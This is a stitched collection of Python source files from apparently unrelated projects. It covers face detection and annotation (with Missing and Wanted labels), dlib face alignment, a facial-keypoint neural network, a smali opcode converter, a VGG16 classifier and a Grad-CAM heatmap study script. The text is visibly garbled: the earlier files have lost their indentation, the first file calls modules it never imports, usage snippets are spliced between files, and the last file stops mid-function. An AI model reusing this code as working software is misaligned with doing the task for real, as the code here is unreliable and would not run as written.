import cv2
import datetime
import netifaces
import numpy as np
from PIL import Image
from proxy.face_database import FaceKind
def save_array(image_array, filename):
im = Image.fromarray(image_array)
im.save(filename)
def image_to_nparray(image):
buf = np.asarray(image)
rgbFrame = np.zeros((image.height, image.width, 3), dtype=np.uint8)
rgbFrame[:, :, 0] = buf[:, :, 0]
rgbFrame[:, :, 1] = buf[:, :, 1]
rgbFrame[:, :, 2] = buf[:, :, 2]
return rgbFrame
def stream_to_image(file):
image = Image.open(cStringIO.StringIO(file.read()))
return image_to_nparray(image)
def file_to_image(path):
image = Image.open(path)
return image_to_nparray(image)
def string_to_image(image_string, head="data:image/jpeg;base64,"):
assert (image_string.startswith(head))
imgdata = base64.b64decode(image_string[len(head):])
imgF = StringIO.StringIO()
imgF.write(imgdata)
imgF.seek(0)
image = Image.open(imgF)
return image_to_nparray(image)
def annotate_face_info(image, detected_faces, faceDatabase):
annotated_frame = np.copy(image)
if detected_faces is None:
return annotated_frame
for detected_face in detected_faces:
bb = detected_face[1]
bl = (bb.left(), bb.bottom())
tr = (bb.right(), bb.top())
identity = detected_face[0]
if identity == -1:
name = "Unknown"
color = (152, 255, 204)
else:
user = faceDatabase.find_user_by_index(identity)
name = user.name
if user.kind is FaceKind.Normal:
color = (64, 255, 92)
elif user.kind is FaceKind.Missing:
color = (156, 117, 235)
elif user.kind is FaceKind.Wanted:
color = (240, 96, 93)
else:
color = (152, 255, 204)
probability = detected_face[2] * 100
cv2.rectangle(annotated_frame, bl, tr, color=color,
thickness=3)
cv2.putText(annotated_frame, name + '[' + str(round(probability, 1)) + '%]', (bb.left(), bb.top() - 10),
cv2.FONT_HERSHEY_SIMPLEX, fontScale=0.75,
color=color, thickness=2)
return annotated_frame
def image_to_url(image):
img = Image.fromarray(image)
imgdata = StringIO.StringIO(img._repr_png_())
imgdata.seek(0)
content = 'data:image/png;base64,' + urllib.quote(base64.b64encode(imgdata.buf))
return content
def now_datetime_to_filename(ext):
now_time = datetime.datetime.now()
filename = '%02d%02d%02d%02d%02d%02d%04d.%s' % (
now_time.year % 100, now_time.month, now_time.day, now_time.hour, now_time.minute, now_time.second,
now_time.microsecond / 100, ext)
return filename
def get_inet_addr():
interfaces = netifaces.interfaces()
for i in interfaces:
if i == 'lo':
continue
iface = netifaces.ifaddresses(i).get(netifaces.AF_INET)
if iface != None:
for j in iface:
return j['addr']
```
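An illustrative round trip through the helpers above, assuming they are imported from this util module; "face.jpg" is a placeholder path, and note the module targets Python 2 given its use of `StringIO`/`cStringIO`.
```python
frame = file_to_image("face.jpg")    # RGB numpy array
data_url = image_to_url(frame)       # back to a base64 data URL for the web client
print(data_url[:40])
```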
#### File: openface/alignment/naive_dlib.py
```python
import argparse
import cv2
import dlib
import numpy as np
import os
import random
import sys
from skimage import io
from .. import helper
from .. import data
class NaiveDlib:
def __init__(self, faceMean, facePredictor):
"""Initialize the dlib-based alignment."""
self.detector = dlib.get_frontal_face_detector()
self.normMeanAlignPoints = loadMeanPoints(faceMean)
self.predictor = dlib.shape_predictor(facePredictor)
def getAllFaceBoundingBoxes(self, img):
return self.detector(img, 1)
def getLargestFaceBoundingBox(self, img):
faces = self.detector(img, 1)
if len(faces) > 0:
return max(faces, key=lambda rect: rect.width() * rect.height())
def align(self, img, bb):
points = self.predictor(img, bb)
return list(map(lambda p: (p.x, p.y), points.parts()))
def alignImg(self, method, size, img, bb=None,
outputPrefix=None, outputDebug=False,
expandBox=False):
if outputPrefix:
helper.mkdirP(os.path.dirname(outputPrefix))
def getName(tag=None):
if tag is None:
return "{}.png".format(outputPrefix)
else:
return "{}-{}.png".format(outputPrefix, tag)
if bb is None:
try:
bb = self.getLargestFaceBoundingBox(img)
except Exception as e:
print("Warning: {}".format(e))
# In rare cases, exceptions are thrown.
return
if bb is None:
# Most failed detection attempts return here.
return
alignPoints = self.align(img, bb)
meanAlignPoints = transformPoints(self.normMeanAlignPoints, bb, True)
(xs, ys) = zip(*meanAlignPoints)
tightBb = dlib.rectangle(left=min(xs), right=max(xs),
top=min(ys), bottom=max(ys))
if method != 'tightcrop':
npAlignPoints = np.float32(alignPoints)
npMeanAlignPoints = np.float32(meanAlignPoints)
if method == 'tightcrop':
warpedImg = img
elif method == 'affine':
ss = np.array([39, 42, 57]) # Eyes and tip of nose.
npAlignPointsSS = npAlignPoints[ss]
npMeanAlignPointsSS = npMeanAlignPoints[ss]
H = cv2.getAffineTransform(npAlignPointsSS, npMeanAlignPointsSS)
warpedImg = cv2.warpAffine(img, H, np.shape(img)[0:2])
elif method == 'perspective':
ss = np.array([39, 42, 48, 54]) # Eyes and corners of mouth.
npAlignPointsSS = npAlignPoints[ss]
npMeanAlignPointsSS = npMeanAlignPoints[ss]
H = cv2.getPerspectiveTransform(
npAlignPointsSS, npMeanAlignPointsSS)
warpedImg = cv2.warpPerspective(img, H, np.shape(img)[0:2])
elif method == 'homography':
(H, mask) = cv2.findHomography(npAlignPoints, npMeanAlignPoints,
method=cv2.LMEDS)
warpedImg = cv2.warpPerspective(img, H, np.shape(img)[0:2])
else:
print("Error: method '{}' is unimplemented.".format(method))
sys.exit(-1)
if method == 'tightcrop':
wAlignPoints = alignPoints
else:
wBb = self.getLargestFaceBoundingBox(warpedImg)
if wBb is None:
return
wAlignPoints = self.align(warpedImg, wBb)
wMeanAlignPoints = transformPoints(
self.normMeanAlignPoints, wBb, True)
if outputDebug:
annotatedImg = annotate(img, bb, alignPoints, meanAlignPoints)
io.imsave(getName("orig"), img)
io.imsave(getName("annotated"), annotatedImg)
if method != 'tightcrop':
wAnnotatedImg = annotate(warpedImg, wBb,
wAlignPoints, wMeanAlignPoints)
io.imsave(getName("warped"), warpedImg)
io.imsave(getName("warped-annotated"), wAnnotatedImg)
if len(warpedImg.shape) != 3:
print(" + Warning: Result does not have 3 dimensions.")
return None
(xs, ys) = zip(*wAlignPoints)
xRange = max(xs) - min(xs)
yRange = max(ys) - min(ys)
if expandBox:
(l, r, t, b) = (min(xs) - 0.20 * xRange, max(xs) + 0.20 * xRange,
min(ys) - 0.65 * yRange, max(ys) + 0.20 * yRange)
else:
(l, r, t, b) = (min(xs), max(xs), min(ys), max(ys))
(w, h, _) = warpedImg.shape
if 0 <= l <= w and 0 <= r <= w and 0 <= b <= h and 0 <= t <= h:
cwImg = cv2.resize(warpedImg[t:b, l:r], (size, size))
h, edges = np.histogram(cwImg.ravel(), 16, [0, 256])
s = sum(h)
if any(h > 0.65 * s):
print("Warning: Image is likely a single color.")
return
else:
print("Warning: Unable to align and crop to the "
"face's bounding box.")
return
if outputPrefix:
io.imsave(getName(), cwImg)
return cwImg
def transformPoints(points, bb, toImgCoords):
if toImgCoords:
def scale(p):
(x, y) = p
return (int((x * bb.width()) + bb.left()),
int((y * bb.height()) + bb.top()))
else:
def scale(p):
(x, y) = p
return (float(x - bb.left()) / bb.width(),
float(y - bb.top()) / bb.height())
return list(map(scale, points))
def loadMeanPoints(modelFname):
def parse(line):
(x, y) = line.strip().split(",")
return (float(x), float(y))
with open(modelFname, 'r') as f:
return [parse(line) for line in f]
def annotate(img, box, points=None, meanPoints=None):
a = np.copy(img)
bl = (box.left(), box.bottom())
tr = (box.right(), box.top())
cv2.rectangle(a, bl, tr, color=(153, 255, 204), thickness=3)
for p in points:
cv2.circle(a, center=p, radius=3, color=(102, 204, 255), thickness=-1)
for p in meanPoints:
cv2.circle(a, center=p, radius=3, color=(0, 0, 0), thickness=-1)
return a
```
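A hedged sketch of driving `NaiveDlib` directly; the two model file paths and the input photo are placeholders, and the files (OpenFace's mean landmark list, dlib's 68-point shape predictor) must be obtained separately.
```python
from skimage import io
# assumed import path: from openface.alignment.naive_dlib import NaiveDlib

align = NaiveDlib("mean.csv", "shape_predictor_68_face_landmarks.dat")  # placeholder paths
img = io.imread("person.jpg")
bb = align.getLargestFaceBoundingBox(img)
if bb is not None:
    aligned = align.alignImg("affine", 96, img, bb=bb)  # 96x96 aligned crop, or None
```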
#### File: 29/yong_celeb_recognize/image.py
```python
import cv2
from matplotlib import pyplot
import numpy as np
def read_sample(filenames):
images = []
for filename in filenames:
image = cv2.imread(filename)
image = cv2.resize(image, (96, 96))
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
image_array = []
for y in range(0, 96, 1):
for x in range(0, 96, 1):
image_array.append((image[y][x] / 255.))
image_array = np.array(image_array)
image_array = image_array.astype(np.float32)
images.append(image_array)
return np.vstack(images)
def plot_sample(x, y, axis):
img = x.reshape(96, 96)
axis.imshow(img, cmap='gray')
axis.scatter(y[0::2] * 48 + 48, y[1::2] * 48 + 48, marker='x', s=10)
def draw_result(X, y):
fig = pyplot.figure(figsize=(6, 6))
fig.subplots_adjust(
left=0, right=1, bottom=0, top=1, hspace=0.05, wspace=0.05)
for i in range(X.shape[0]):
ax = fig.add_subplot(4, 4, i + 1, xticks=[], yticks=[])
plot_sample(X[i], y[i], ax)
pyplot.show()
```
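An assumed usage pattern combining these helpers with nn2.py below; the image paths are placeholders, the checkpoint name matches the one written by `backupCNN()`, and the Lasagne/nolearn stack must be installed.
```python
from nn2 import loadNet2, predcit2

net = loadNet2("net-epoch-step.pickle")        # checkpoint written by backupCNN()
X = read_sample(["face1.jpg", "face2.jpg"])    # (N, 9216) float32 rows
y = predcit2(net, X)                           # 30 keypoint coordinates per face
draw_result(X, y)
```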
#### File: 29/yong_celeb_recognize/nn2.py
```python
import pickle
from matplotlib import pyplot
import os
import numpy as np
from pandas.io.parsers import read_csv
from sklearn.utils import shuffle
from lasagne import layers
from lasagne.updates import nesterov_momentum
from nolearn.lasagne import NeuralNet, BatchIterator
FTRAIN = './data/training.csv'
FTEST = './data/test.csv'
SPECIALIST_SETTINGS = [
dict(
columns=(
'left_eye_center_x', 'left_eye_center_y',
'right_eye_center_x', 'right_eye_center_y',
),
flip_indices=((0, 2), (1, 3)),
),
dict(
columns=(
'nose_tip_x', 'nose_tip_y',
),
flip_indices=(),
kwargs=dict(dropout2_p=0.3, dropout3_p=0.4), # !
),
dict(
columns=(
'mouth_left_corner_x', 'mouth_left_corner_y',
'mouth_right_corner_x', 'mouth_right_corner_y',
'mouth_center_top_lip_x', 'mouth_center_top_lip_y',
),
flip_indices=((0, 2), (1, 3)),
),
dict(
columns=(
'mouth_center_bottom_lip_x',
'mouth_center_bottom_lip_y',
),
flip_indices=(),
),
dict(
columns=(
'left_eye_inner_corner_x', 'left_eye_inner_corner_y',
'right_eye_inner_corner_x', 'right_eye_inner_corner_y',
'left_eye_outer_corner_x', 'left_eye_outer_corner_y',
'right_eye_outer_corner_x', 'right_eye_outer_corner_y',
),
flip_indices=((0, 2), (1, 3), (4, 6), (5, 7)),
),
dict(
columns=(
'left_eyebrow_inner_end_x', 'left_eyebrow_inner_end_y',
'right_eyebrow_inner_end_x', 'right_eyebrow_inner_end_y',
'left_eyebrow_outer_end_x', 'left_eyebrow_outer_end_y',
'right_eyebrow_outer_end_x', 'right_eyebrow_outer_end_y',
),
flip_indices=((0, 2), (1, 3), (4, 6), (5, 7)),
),
]
def load(test=False, cols=None):
"""Loads data from FTEST if *test* is True, otherwise from FTRAIN.
Pass a list of *cols* if you're only interested in a subset of the
target columns.
"""
fname = FTEST if test else FTRAIN
df = read_csv(os.path.expanduser(fname)) # load pandas dataframe
# The Image column has pixel values separated by space; convert
# the values to numpy arrays:
df['Image'] = df['Image'].apply(lambda im: np.fromstring(im, sep=' '))
if cols: # get a subset of columns
df = df[list(cols) + ['Image']]
print(df.count()) # prints the number of values for each column
df = df.dropna() # drop all rows that have missing values in them
X = np.vstack(df['Image'].values) / 255. # scale pixel values to [0, 1]
X = X.astype(np.float32)
if not test: # only FTRAIN has any target columns
y = df[df.columns[:-1]].values
y = (y - 48) / 48 # scale target coordinates to [-1, 1]
X, y = shuffle(X, y, random_state=42) # shuffle train data
y = y.astype(np.float32)
else:
y = None
return X, y
class FlipBatchIterator(BatchIterator):
flip_indices = [
(0, 2), (1, 3),
(4, 8), (5, 9), (6, 10), (7, 11),
(12, 16), (13, 17), (14, 18), (15, 19),
(22, 24), (23, 25),
]
def transform(self, Xb, yb):
Xb, yb = super(FlipBatchIterator, self).transform(Xb, yb)
# Flip half of the images in this batch at random:
bs = Xb.shape[0]
        indices = np.random.choice(bs, bs // 2, replace=False)  # integer count (Python 3 compatible)
Xb[indices] = Xb[indices, :, :, ::-1]
if yb is not None:
# Horizontal flip of all x coordinates:
yb[indices, ::2] = yb[indices, ::2] * -1
# Swap places, e.g. left_eye_center_x -> right_eye_center_x
for a, b in self.flip_indices:
yb[indices, a], yb[indices, b] = (
yb[indices, b], yb[indices, a])
return Xb, yb
import theano
def float32(k):
return np.cast['float32'](k)
class AdjustVariable(object):
def __init__(self, name, start=0.03, stop=0.001):
self.name = name
self.start, self.stop = start, stop
self.ls = None
def __call__(self, nn, train_history):
if self.ls is None:
self.ls = np.linspace(self.start, self.stop, nn.max_epochs)
epoch = train_history[-1]['epoch']
new_value = float32(self.ls[epoch - 1])
getattr(nn, self.name).set_value(new_value)
class EarlyStopping(object):
def __init__(self, patience=100):
self.patience = patience
self.best_valid = np.inf
self.best_valid_epoch = 0
self.best_weights = None
def __call__(self, nn, train_history):
current_valid = train_history[-1]['valid_loss']
current_epoch = train_history[-1]['epoch']
if current_valid < self.best_valid:
self.best_valid = current_valid
self.best_valid_epoch = current_epoch
self.best_weights = nn.get_all_params_values()
elif self.best_valid_epoch + self.patience < current_epoch:
print("Early stopping.")
print("Best valid loss was {:.6f} at epoch {}.".format(
self.best_valid, self.best_valid_epoch))
nn.load_params_from(self.best_weights)
raise StopIteration()
def backupCNN(nn, train_history):
nn.save_params_to('net-epoch-step.pickle')
def loadNet2(netName):
net = NeuralNet(
layers=[
('input', layers.InputLayer),
('conv1', layers.Conv2DLayer),
('pool1', layers.MaxPool2DLayer),
('dropout1', layers.DropoutLayer), # !
('conv2', layers.Conv2DLayer),
('pool2', layers.MaxPool2DLayer),
('dropout2', layers.DropoutLayer), # !
('conv3', layers.Conv2DLayer),
('pool3', layers.MaxPool2DLayer),
('dropout3', layers.DropoutLayer), # !
('hidden4', layers.DenseLayer),
('dropout4', layers.DropoutLayer), # !
('hidden5', layers.DenseLayer),
('output', layers.DenseLayer),
],
input_shape=(None, 1, 96, 96),
conv1_num_filters=32, conv1_filter_size=(3, 3), pool1_pool_size=(2, 2),
dropout1_p=0.1, # !
conv2_num_filters=64, conv2_filter_size=(2, 2), pool2_pool_size=(2, 2),
dropout2_p=0.2, # !
conv3_num_filters=128, conv3_filter_size=(2, 2), pool3_pool_size=(2, 2),
dropout3_p=0.3, # !
hidden4_num_units=1000, # !
dropout4_p=0.5,
hidden5_num_units=1000, # !
output_num_units=30, output_nonlinearity=None,
update_learning_rate=theano.shared(float32(0.03)),
update_momentum=theano.shared(float32(0.9)),
regression=True,
batch_iterator_train=FlipBatchIterator(batch_size=128),
on_epoch_finished=[
AdjustVariable('update_learning_rate', start=0.03, stop=0.0001),
AdjustVariable('update_momentum', start=0.9, stop=0.999),
EarlyStopping(patience=200),
backupCNN,
],
max_epochs=10000,
verbose=1,
)
net.load_params_from(netName)
return net
def predcit2(net, X):
X = X.reshape(-1, 1, 96, 96)
return net.predict(X)
``` |
{
"source": "1Stohk1/tami",
"score": 3
} |
#### File: cati/utils/opcode.py
```python
import re
from cati.utils.cati_config import *
class Converter:
exDict = {}
def __init__(self):
"""Takes in input the text file in which is saved the dictionary to translate in OPCode"""
with open(DICTIONARY, encoding='utf-8') as f:
for line in f:
(key, val) = line.split(" -> ")
val = val.strip("\n")
self.exDict[key] = val
def __str__(self):
return f"These {self.exDict} are the words that will be converted"
def encoder(self, content):
"""For every word in the converting dictionary check if in the smali text
there is a correspondence, if true tranlate it in the opportune val of the key"""
for word, opcode in self.exDict.items():
content = re.sub(word, opcode, content)
return content
```
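A minimal sketch of the converter, assuming the `DICTIONARY` file configured in cati_config exists; its contents and the smali line below are invented examples of the `word -> opcode` format parsed in `__init__`.
```python
from cati.utils.opcode import Converter

# DICTIONARY is expected to contain lines such as:
#   invoke-virtual -> V
#   invoke-direct -> D
converter = Converter()
print(converter.encoder("invoke-virtual {v0}, Ljava/lang/String;->length()I"))
```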
#### File: tami/models_code/VGG16.py
```python
from tensorflow.keras.layers import Dense, Flatten, Input
from tensorflow.keras.models import Model
from tensorflow.keras.applications import vgg16
from tensorflow.keras.metrics import Precision, Recall, AUC
class VGG16_19:
def __init__(self, num_classes, img_size, channels, weights='imagenet', name="VGG", include_top=False):
self.name = name
self.weights = weights
self.include_top = include_top
self.num_classes = num_classes
self.input_width_height = img_size
self.channels = channels
self.input_type = 'images'
def build(self):
base_model = None
output = None
if self.include_top:
if self.input_width_height != 224 or self.channels != 3:
print("IF include_top=True, input_shape MUST be (224,224,3), exiting...")
exit()
else:
if self.name == "VGG" or self.name == "VGG16":
base_model = vgg16.VGG16(weights=self.weights, include_top=True, classes=self.num_classes)
else:
print("Invalid name, accepted 'VGG1619', exiting...")
exit()
output = base_model.output
else:
inputs = Input(shape=(self.input_width_height, self.input_width_height, self.channels))
if self.name == "VGG" or self.name == "VGG16":
base_model = vgg16.VGG16(weights=self.weights, include_top=False, input_tensor=inputs)
else:
print("Invalid name, accepted 'VGG16', exiting...")
exit()
flatten = Flatten(name='my_flatten')
output_layer = Dense(self.num_classes, activation='softmax', name='my_predictions')
output = output_layer(flatten(base_model.output))
input_layer = base_model.input
model = Model(input_layer, output)
# model.summary(line_length=50)
model.compile(loss='categorical_crossentropy', optimizer='adam',
metrics=['acc', Precision(name="prec"), Recall(name="rec"), AUC(name='auc')])
return model
```
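A minimal build example; the class count and image size are arbitrary values. With the default `include_top=False` the input size is free, otherwise it must be 224x224x3 as the check above enforces.
```python
from models_code.VGG16 import VGG16_19

vgg = VGG16_19(num_classes=5, img_size=128, channels=3)
model = vgg.build()
model.summary()
```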
#### File: old_tool/utils_backup/apply_gradcam_cumulativeHeatmaps.py
```python
import math
from models_code.gradcam import GradCAM
from utils import config
from utils.handle_modes import process_path
import tensorflow as tf
import os
import numpy as np
import imutils
import random
import cv2
def merg_average_pic(pic1, pic2, shape):
    pic_new = np.zeros(shape=shape, dtype=int)  # match the input dimensionality (2-D or 3-D)
for i in range(shape[0]):
for j in range(shape[1]):
if len(shape) == 2:
try:
pic_new[i, j] = (int(pic1[i, j]) + int(pic2[i, j])) / 2
except RuntimeWarning:
print("CATCHED: {} {}".format(pic1[i, j], pic2[i, j]))
else:
for el in range(shape[2]):
pic_new[i, j, el] = (pic1[i, j, el] + pic2[i, j, el]) / 2
return pic_new
def merg_pics(list_of_pic):
shape = list_of_pic[0].shape
if len(shape) != 2:
print("ERRORE")
exit()
pic_new = np.zeros(shape=(shape[0], shape[1]), dtype='uint8')
pic_std = np.zeros(shape=(shape[0], shape[1]), dtype='uint8')
# Per each pixel i,j and per each image n, sum up the values and then...
for i in range(shape[0]):
for j in range(shape[1]):
temp = 0
for n in range(len(list_of_pic)):
temp += list_of_pic[n][i, j]
# diveded by the number of pic, to get an AVG pixel
pic_new[i, j] = temp / len(list_of_pic)
# Per each pixel i,j and per each image n, sum up the difference between the average (what is inside pic_new[i,j])
# and the pixel[i,j] of image n (to calculate the distance beetween that pixed to the average).
# then to the power of 2, divided by number of pics and squared to apply the formula for Standard Deviation
for i in range(shape[0]):
for j in range(shape[1]):
temp = 0
for n in range(len(list_of_pic)):
temp += (list_of_pic[n][i, j] - int(pic_new[i, j])) ** 2
pic_std[i, j] = math.sqrt(temp / len(list_of_pic))
return pic_new, pic_std
def apply_gradcam(arguments, model, class_info):
# initialize the gradient class activation map
cam = GradCAM(model)
for img_class in class_info["class_names"]:
# Adding also a '/' to ensure path correctness
label_path = config.main_path + arguments.dataset + "/test/" + img_class
# Get all file paths in 'label_path' for the class 'label'
files = [i[2] for i in os.walk(label_path)]
num_samples = 50
# Randomly extract 'num_sample' from the file paths, in files there is a [[files_paths1, filepath2,...]]
imgs = random.sample(files[0], num_samples)
gray_heatmaps = []
gray_heatmaps_WRONG = []
color_heatmaps = []
fixed_size_studyMap = 700
# create folder in /results/images for this class
if not os.path.isdir(config.main_path + 'results/images/' + img_class):
os.mkdir(config.main_path + 'results/images/' + img_class)
result_images_path = config.main_path + 'results/images/' + img_class
for i in range(num_samples):
complete_path = label_path + "/" + imgs[i]
img_filename = imgs[i].split(".")[0]
# load the original image from disk (in OpenCV format) and then
# resize the image to its target dimensions
orig = cv2.imread(complete_path)
# resized = cv2.resize(orig, (arguments.image_size, arguments.image_size))
image, _ = process_path(complete_path)
image = tf.expand_dims(image, 0)
# use the network to make predictions on the input imag and find
# the class label index with the largest corresponding probability
preds = model.predict(image)
i = np.argmax(preds[0])
# decode the ImageNet predictions to obtain the human-readable label
# decoded = imagenet_utils.decode_predictions(preds)
# (imagenetID, label, prob) = decoded[0][0]
# label = "{}: {:.2f}%".format(label, prob * 100)
correctness = "WRONG " if img_class != class_info["class_names"][int(i)] else ""
label = "{}{} - {:.1f}%".format(correctness, class_info["class_names"][int(i)], preds[0][i] * 100)
print("[INFO] {}".format(label))
# build the heatmap
heatmap = cam.compute_heatmap(image, i)
# resize to fixed size and add the heatmap to the study struct
# at this point the heatmap contains integer value scaled [0, 255]
heatmap_raw = heatmap.copy()
heatmap_raw = cv2.resize(heatmap_raw, (fixed_size_studyMap, fixed_size_studyMap))
if correctness == "":
gray_heatmaps.append(heatmap_raw)
else:
gray_heatmaps_WRONG.append(heatmap_raw)
# resize the resulting heatmap to the original input image dimensions
heatmap = cv2.resize(heatmap, (orig.shape[1], orig.shape[0]))
# overlay heatmap on top of the image
(heatmap, output) = cam.overlay_heatmap(heatmap, orig, alpha=0.5)
# heatmap_comparison for printing also heatmap alone with filename
heatmap_comparison = heatmap.copy()
# resize images
orig = imutils.resize(orig, width=400)
heatmap = imutils.resize(heatmap, width=400)
heatmap_comparison = imutils.resize(heatmap_comparison, width=400)
output = imutils.resize(output, width=400)
# create a black background to include text
black = np.zeros((35, orig.shape[1], 3), np.uint8)
black[:] = (0, 0, 0)
# concatenate vertically to the image
orig = cv2.vconcat((black, orig))
heatmap = cv2.vconcat((black, heatmap))
heatmap_comparison = cv2.vconcat((black, heatmap_comparison))
output = cv2.vconcat((black, output))
# write some text over each image
cv2.putText(orig, label, (10, 25), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255, 255, 255))
cv2.putText(heatmap, "Heatmap", (10, 25), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255, 255, 255))
cv2.putText(heatmap_comparison, img_filename.split('_')[2], (10, 25), cv2.FONT_HERSHEY_SIMPLEX,
0.6, (255, 255, 255))
cv2.putText(output, "Overlay with Heatmap", (10, 25), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255, 255, 255))
# display the original image and resulting heatmap and output image
complete = np.hstack([orig, heatmap, output])
# complete = imutils.resize(complete, width=700)
semi_complete = np.hstack([orig, output])
# semi_complete = imutils.resize(semi_complete, width=350)
cv2.imwrite(result_images_path + '/complete_' + img_filename.split('_')[2] + '.png', complete)
# cv2.imwrite(result_images_path + '/semi_' + img_filename.split('_')[2] + '.png', semi_complete)
color_heatmaps.append(heatmap_comparison)
# Display images
# cv2.imshow("Original", orig)
# cv2.imshow("Heatmap", heatmap)
# cv2.imshow("Overlay", output)
# cv2.imshow("Complete", complete)
# cv2.imshow("Semi-Complete", semi_complete)
# cv2.waitKey(0)
# for x in range(heatmap_new.shape[0]):
# for y in range(heatmap_new.shape[1]):
# if sum(heatmap_new[x, y]) < 325:
# heatmap_new[x, y] = np.array([0, 0, 0])
if num_samples >= 5:
valid_heatmap = []
for i in range(num_samples):
if color_heatmaps[i].shape == (435, 400, 3) and not np.all((color_heatmaps[i] == 0)):
valid_heatmap.append(i)
if len(valid_heatmap) == 5:
break
if len(valid_heatmap) == 5:
compared_heatmaps = np.hstack([color_heatmaps[valid_heatmap[0]], color_heatmaps[valid_heatmap[1]],
color_heatmaps[valid_heatmap[2]], color_heatmaps[valid_heatmap[3]],
color_heatmaps[valid_heatmap[4]]])
cv2.imwrite(result_images_path + '/comparison_' + img_class + '.png', compared_heatmaps)
# for n in range(num_samples):
# cv2.imwrite(main_path + 'results/images/gray_' + img_class + '_' + str(n) + '.png', gray_heatmaps[n])
# pic1 = merg_average_pic(gray_heatmaps[0], gray_heatmaps[1], gray_heatmaps[1].shape)
# cv2.imwrite(main_path + 'results/images/graysum1_' + img_class + '.png', pic1)
# pic2 = merg_average_pic(gray_heatmaps[2], gray_heatmaps[3], gray_heatmaps[2].shape)
# cv2.imwrite(main_path + 'results/images/graysum2_' + img_class + '.png', pic2)
# pic3 = merg_average_pic(pic1, pic2, pic1.shape)
# for x in range(pic1.shape[0]):
# print(pic3[x])
# cv2.imwrite(main_path + 'results/images/graysum3_' + img_class + '.png', pic3)
# merging heatmaps into one cumulative heatmap, creating also standard deviation image
print("[INFO] Generating Cumulative Heatmap for {}...".format(img_class), end='', flush=True)
pic_avg, pic_std = merg_pics(gray_heatmaps)
print("DONE!")
cv2.imwrite(result_images_path + '/grayscaleAVG_' + img_class + '.png', pic_avg)
cv2.imwrite(result_images_path + '/grayscaleSTD_' + img_class + '.png', pic_std)
# add color to cumulative heatmap and STD image
pic_avg_colored = cv2.applyColorMap(pic_avg, cv2.COLORMAP_VIRIDIS)
pic_std_colored = cv2.applyColorMap(pic_std, cv2.COLORMAP_VIRIDIS)
cv2.imwrite(result_images_path + '/colorAVG_' + img_class + '.png', pic_avg_colored)
        cv2.imwrite(result_images_path + '/colorSTD_' + img_class + '.png', pic_std_colored)
# Store the raw heatmaps per family
        for ind in range(len(gray_heatmaps)):
            cv2.imwrite(result_images_path + '/heatmap_' + str(ind) + '.png', gray_heatmaps[ind])
        j = len(gray_heatmaps)
        # misclassified samples were collected separately in gray_heatmaps_WRONG
        for ind in range(len(gray_heatmaps_WRONG)):
            cv2.imwrite(result_images_path + '/heatmapWRONG_' + str(j) + '.png', gray_heatmaps_WRONG[ind])
            j += 1
# n_box = 50
# step = fixed_size_studyMap / n_box
# box = np.zeros(shape=(n_box, n_box), dtype=int)
# box_counter = np.zeros(shape=(n_box, n_box), dtype=int)
# xs = -1
# for x in range(fixed_size_studyMap):
# if x % step == 0:
# xs += 1
# ys = -1
# for y in range(fixed_size_studyMap):
# if y % step == 0:
# ys += 1
# box[xs, ys] += pic3[x, y]
# pixel_per_box = (fixed_size_studyMap / n_box) * (fixed_size_studyMap / n_box)
# print(box)
# print(box // pixel_per_box)
# Display images
# cv2.imshow("ONE", compl_heatmap[0])
# cv2.imshow("TWO", compl_heatmap[1])
# cv2.imshow("THREE", compl_heatmap[2])
# (heatmap_merg_1, output_merg_1) = cam.overlay_heatmap(compl_heatmap[0], compl_heatmap[1], alpha=0.4)
# cv2.imshow("MERGED_1", output_merg_1)
# (heatmap_merg_2, output_merg_2) = cam.overlay_heatmap(compl_heatmap[2], compl_heatmap[3], alpha=0.4)
# (heatmap_merg_3, output_merg_3) = cam.overlay_heatmap(output_merg_1, output_merg_2, alpha=0.4)
# cv2.imshow("MERGED_2", output_merg_2)
# semi_complete_merged1 = np.hstack([compl_heatmap[0], compl_heatmap[1], compl_heatmap[2], compl_heatmap[3]])
# semi_complete_merged1 = imutils.resize(semi_complete_merged1, height=450)
# cv2.imshow("BASELINE", semi_complete_merged1)
# semi_complete_merged2 = np.hstack([output_merg_1, output_merg_2, output_merg_3])
# semi_complete_merged2 = imutils.resize(semi_complete_merged2, height=400)
# cv2.imshow("MERGED", semi_complete_merged2)
# cv2.imwrite(main_path + 'results/images/' + img_class + "_BASE1.png", semi_complete_merged1)
# cv2.imwrite(main_path + 'results/images/' + img_class + "_MERGED1.png", semi_complete_merged2)
# cv2.imshow("Complete", complete)
# cv2.imshow("Semi-Complete", semi_complete)
# (heatmap_merg_1, output_merg_1) = cam.overlay_heatmap(compl_heatmap[0], compl_heatmap[1], alpha=0.4)
# cv2.imshow("MERGED_1", output_merg_1)
# (heatmap_merg_2, output_merg_2) = cam.overlay_heatmap(compl_heatmap[2], compl_heatmap[3], alpha=0.4)
# (heatmap_merg_3, output_merg_3) = cam.overlay_heatmap(output_merg_1, output_merg_2, alpha=0.4)
# output_merg_1 = merg_average_pic(compl_heatmap[0], compl_heatmap[1], compl_heatmap[0].shape)
# output_merg_2 = merg_average_pic(compl_heatmap[2], compl_heatmap[3], compl_heatmap[2].shape)
# output_merg_3 = merg_average_pic(output_merg_1, output_merg_2, compl_heatmap[0].shape)
# cv2.imshow("MERGED_2", output_merg_2)
# semi_complete_merged1 = np.hstack([compl_heatmap[0], compl_heatmap[1], compl_heatmap[2], compl_heatmap[3]])
# semi_complete_merged1 = imutils.resize(semi_complete_merged1, height=450)
# cv2.imshow("BASELINE", semi_complete_merged1)
# semi_complete_merged2 = np.hstack([output_merg_1, output_merg_2, output_merg_3])
# semi_complete_merged2 = imutils.resize(semi_complete_merged2, height=400)
# cv2.imshow("MERGED", semi_complete_merged2)
# cv2.imwrite(main_path + 'results/images/' + img_class + "_BASE2.png", semi_complete_merged1)
# cv2.imwrite(main_path + 'results/images/' + img_class + "_MERGED2.png", semi_complete_merged2)
# cv2.imshow("Complete", complete)
# cv2.imshow("Semi-Complete", semi_complete)
# cv2.waitKey(0)
# exit()
```
#### File: tami/utils/generic_utils.py
```python
from utils.config import *
# GLOBAL VAR
progr_bar_lenght = 20
def print_log(string, print_on_screen=False, print_on_file=True):
if print_on_screen:
print(string)
if print_on_file:
with open(main_path + 'results/exec_logs/' + timeExec + ".results", 'a') as logfile:
logfile.write(string + "\n")
```
#### File: tami/utils/preprocessing_data.py
```python
import os
import numpy as np
import pickle
import pathlib
from random import shuffle, choice
def get_info_dataset(dataset_path, update=False):
